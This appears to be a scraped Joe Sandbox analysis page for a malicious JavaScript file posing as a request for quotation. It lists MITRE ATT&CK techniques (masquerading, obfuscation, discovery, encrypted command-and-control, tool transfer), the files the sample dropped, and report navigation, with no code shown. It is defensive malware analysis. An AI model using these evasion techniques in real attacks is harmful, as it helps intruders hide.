Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RFQ-PR 1-62557 & 38929 III.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\195774460[1].jpg

C:\Users\user\AppData\Local\Temp\aqgeukibkal\gnldmmsk.mp3

C:\Users\user\AppData\Local\Temp\aqgeukibkal\ingobxndsgvxkm.bls

C:\Users\user\AppData\Local\Temp\aqgeukibkal\tbcj.onj

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: wscript.exePID: 4144, Parent PID: 1028

General

Windows Analysis Report
RFQ-PR 1-62557 & 38929 III.js